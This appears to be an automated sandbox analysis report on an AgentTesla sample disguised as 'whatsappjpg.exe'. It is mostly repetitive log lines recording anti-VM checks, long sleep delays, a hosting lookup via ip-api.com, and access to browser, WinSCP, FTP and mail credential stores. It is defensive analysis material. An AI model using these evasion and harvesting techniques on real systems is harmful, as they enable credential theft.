Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\whatsappjpg.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\whatsappjpg.exe	API/Special instruction interceptor: Address: 656B830
Source: C:\Users\user\Desktop\whatsappjpg.exe	API/Special instruction interceptor: Address: 31FB830

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\whatsappjpg.exe	RDTSC instruction interceptor: First address: 6513551 second address: 6513551 instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2E7523A906h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test dl, bl 0x0000000c rdtsc
Source: C:\Users\user\Desktop\whatsappjpg.exe	RDTSC instruction interceptor: First address: 31A3551 second address: 31A3551 instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2E752389A6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test dl, bl 0x0000000c rdtsc

Source: C:\Users\user\Desktop\whatsappjpg.exe	Memory allocated: 120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Memory allocated: 36450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Memory allocated: 36360000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597591	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597154	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594722	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594594	Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe	Window / User API: threadDelayed 2329			Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Window / User API: threadDelayed 7522			Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\whatsappjpg.exe

API coverage: 1.3 %

Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 920	Thread sleep count: 2329 > 30	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 920	Thread sleep count: 7522 > 30	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597591s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597154s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -594722s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe TID: 3716	Thread sleep time: -594594s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\whatsappjpg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\whatsappjpg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_0040276E FindFirstFileW,	8_2_0040276E
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_00405770
Source: C:\Users\user\Desktop\whatsappjpg.exe	Code function: 8_2_0040622B FindFirstFileW,FindClose,	8_2_0040622B

Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597591	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597154	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594722	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Thread delayed: delay time: 594594	Jump to behavior

Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D48000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\whatsappjpg.exe	API call chain: ExitProcess graph end node			graph_0-4486
Source: C:\Users\user\Desktop\whatsappjpg.exe	API call chain: ExitProcess graph end node			graph_0-4491

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,

0_2_00401752

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\whatsappjpg.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Process created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"

Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe	Queries volume information: C:\Users\user\Desktop\whatsappjpg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\whatsappjpg.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Users\user\Desktop\whatsappjpg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: whatsappjpg.exe PID: 1284, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\whatsappjpg.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\whatsappjpg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\whatsappjpg.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\whatsappjpg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\whatsappjpg.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: whatsappjpg.exe PID: 1284, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: whatsappjpg.exe PID: 1284, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
